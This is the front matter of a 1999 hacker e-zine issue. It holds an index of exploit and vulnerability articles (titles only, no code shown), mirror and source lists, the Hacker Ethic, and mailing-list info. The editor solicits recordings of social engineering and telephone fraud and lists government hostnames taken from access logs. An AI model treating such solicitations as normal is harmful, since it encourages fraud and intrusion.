[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 39 Volume 1 1999 Oct 24th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "ABUSUS NON TOLLIT USUM" ========================================================================== Today the spotlight may be on you, some interesting machines that have accessed these archives recently... marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= http://welcome.to/HWA.hax0r.news/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting! =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= The Hacker's Ethic Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= A Comment on FORMATTING: Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax. I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns in the past I've endevoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim, I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= New mirror sites http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.sysbreakers.com/hwa http://www.attrition.org/hosted/hwa/ http://www.ducktank.net/hwa/issues.html. http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites but they offer 20M & I need the space... ** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. *DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #39 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =--------------------------------------------------------------------------= Issue #39 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ `ABUSUS NON TOLLIT USUM'? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Exploit for Openlink's web configurator for Linux/glibc2......... 04.0 .. sco_cancel.c yields egid=18(lp) Tested on SCO 5.0.5+Skunkware98.. 05.0 .. Smail + RPMmail Exploit.......................................... 06.0 .. ftpspy, ftp exploit.............................................. 07.0 .. A vulnerability exists in the /usr/lib/merge/dos7utils program... 08.0 .. SCO OpenServer symlink vulnerability (Brock Tellier)............. 09.0 .. GREX cyberspace.org - Free shell access......................... 10.0 .. Shamrock Says it Was All A Lie .................................. 11.0 .. China Fortifies Cyber Defenses .................................. 12.0 .. Amnesty Program for Pirated Software Fails Miserably ............ 13.0 .. A New Look at InfoWar ........................................... 14.0 .. Another Security Challenge ...................................... 15.0 .. University Shutdown After Attack ................................ 16.0 .. More Melissa Strains ............................................ 17.0 .. Loyalty Cards are Not As Private As People Think ................ 18.0 .. Interview With the Cult of the Dead Cow ......................... 19.0 .. Amazon.com Hosts Crypto Challenge ............................... 20.0 .. Web Sites Cause Crime, Report Says .............................. 21.0 .. China to Use Viruses During War ................................. 22.0 .. Call for Public Security Database ............................... 23.0 .. GAO Calls for Security Laws ..................................... 24.0 .. RingZero Still on the Loose ..................................... 25.0 .. MTV Called Inexcusable By ITC ................................... 26.0 .. Bush Web Site Defaced ........................................... 27.0 .. Space Rogue, Editor of HNN, on ABC News Webcast Today ........... 28.0 .. 20% of Hosts in Singapore Vulnerable ............................ 29.0 .. Zambia's First Computer Crime Trial ............................. 30.0 .. Russian Infowar Debunked ........................................ 31.0 .. Distributed Coordinated Attacks ................................. 32.0 .. Possible Network Intrusion Scenario ............................. 33.0 .. Intrusion Detection Provides A Pound Of Prevention .............. 34.0 .. Advanced buffer overflow exploit Written by Taeho Oh............. 35.0 .. UK Gov. Given Lifetime Menace Award ............................. 36.0 .. DOD Sys Admins Need Top Secret Clearance ........................ 37.0 .. Singapore Tough on Cyber Crime .................................. 38.0 .. Student Poses as Teacher for Prank .............................. 39.0 .. Axent Makes Outrageous Claims ................................... 40.0 .. Where Do We Stand With Crypto ................................... 41.0 .. Customs Service Uses Web to Catch Crooks ........................ 42.0 .. Virus and Marines Fight It Out In the Pentagon .................. 43.0 .. LAPD Abuse Wiretapping Power .................................... 44.0 .. Three Blind Men Await Trial in Israel For Computer Crime ........ 45.0 .. ARM Target of Cyber Attack ...................................... 46.0 .. Military Unit Formed For Domestic Deployment .................... 47.0 .. cDc Interview Posted On Slashdot ................................ 48.0 .. Buffer Overflow in Communicator May Allow Code to Run ........... 49.0 .. Listserver hacked................................................ 50.0 .. Skewl: "How a Netmask Works" By Steven Lee....................... 51.0 .. More proxies supplied by IRC 4 ALL............................... 52.0 .. Perl source for a webspoofing HTTP grabber....................... 53.0 .. MACMILLAN USA MOVES TO SECURE LINUX.............................. 54.0 .. ANONYMOUS REMAILERS.............................................. 55.0 .. PROJECT GAMMA STILL DOWN......................................... 56.0 .. PRIVATE DESKTOP.................................................. 57.0 .. Y2K RELATED DISASTER............................................. 58.0 .. ANTI-MS SOFTWARE................................................. 59.0 .. HOTMAIL: ANOTHER VULNERABILITY, THE SOAP CONTINUES............... 60.0 .. Books: Hacking Exposed: Network Security Secrets and Solutions .. 61.0 .. Microsoft Java Virtual Machine Class Cast Vulnerability.......... 62.0 .. OmniHTTPD Buffer Overflow Vulnerability.......................... 63.0 .. Linux cwdtools Vulnerabilities................................... 64.0 .. WU-Ftpd NEW DoS vulnerabilty..................................... 65.0 .. Axent Raptor Denial of Service Vulnerability..................... 66.0 .. RedHat screen pty(7) Vulnerability............................... 67.0 .. Microsoft Excel File Import Macro Execution Vulnerability........ 68.0 .. Checkpoint Firewall-1 LDAP Authentication Vulnerability.......... 69.0 .. Microsoft Excel SYLK Macro Execution Vulnerability............... 70.0 .. Wu-ftpd message Buffer Overflow Vulnerability.................... 71.0 .. Tribal Voice PowWow Password Vulnerabilities..................... 72.0 .. RedHat lpr/lpd Vulnerabilities................................... 73.0 .. Gauntlet Firewall Rules Bypass Vulnerability..................... 74.0 .. Microsoft IE5 Javascript URL Redirection Vulnerability........... 75.0 .. OpenLink 3.2 Remote Buffer Overflow Vulnerability................ 76.0 .. RedHat PAM NIS Locked Accounts Vulnerability..................... 77.0 .. Microsoft IE5 IFRAME Vulnerability............................... 78.0 .. SCO OpenServer 5.0.5 'userOsa' symlink Vulnerability............. 79.0 .. ARE VIRUSES Y2K COMPLIANT?....................................... 80.0 .. COMPUTER SECURITY AT CENTER OF DOE PROBLEMS...................... 81.0 .. US REVISITS SOURCE CODE LIMITS................................... 82.0 .. SECURITY FOR AD-HOC WIRELESS NETWORKS............................ 83.0 .. GOV'T IT EXECS SEEK SOFTWARE ACCOUNTABILITY...................... 84.0 .. DEFAULT #7 OUT................................................... 85.0 .. UK POLICE GETTING THE POWER TO TAP E-MAIL?....................... 86.0 .. WASHINGTON DIVIDED ON NET SIGNATURES BILL........................ 87.0 .. FEDS STILL HAVING TROUBLE FINDING CYBERSECURITY.................. 88.0 .. CALIFORNIA TAKES DIGITAL SIGNATURES INTO USE..................... 89.0 .. AMAZON'S CRYPTO CONTEST CRACKED WITHIN HOURS..................... 90.0 .. SANS: CYBERSECURITY RISKS REAL .................................. 91.0 .. "INTERVIEW" WITH MISTUH CLEAN.................................... 92.0 .. Inside Happy Hacker Oct 20th..................................... 93.0 .. Security Focus Newsletter........................................ 94.0 .. THE TRINITY OF A QUALITY INFORMATION SECURITY PROGRAM v2......... =-------------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: POSTPONED til further notice, place: TBA.......... Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Websites; sAs72.......................: http://members.tripod.com/~sAs72/ Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/ @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) Sender: ISN Mailing List From: mea culpa Subject: Where has ISN been? Comments: To: InfoSec News To: ISN@SECURITYFOCUS.COM It all starts long ago, on a network far away.. Not really. Several months ago the system that hosted the ISN mail list was taken offline. Before that occured, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe. As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. THey are providing the bandwidth, machine, and listserv that runs the list now. Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn". As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;) mea_culpa www.attrition.org --[ Old ISN welcome message [Last updated on: Mon Nov 04 0:11:23 1998] InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and effeciently filter past the articles of no interest. This list will contain: o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more. o Information on where to obtain articles in current magazines. o Security Book reviews and information. o Security conference/seminar information. o New security product information. o And anything else that comes to mind.. Feedback is encouraged. The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list. Please do NOT: * subscribe vanity mail forwards to this list * subscribe from 'free' mail addresses (ie: juno, hotmail) * enable vacation messages while subscribed to mail lists * subscribe from any account with a small quota All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s). Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributers. ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn ISN Archive: http://www.landfield.com/isn ISN Archive: http://www.jammed.com/Lists/ISN/ ISN is Moderated by 'mea_culpa' . ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion. The ISN membership list is NOT available for sale or disclosure. ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs. @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black 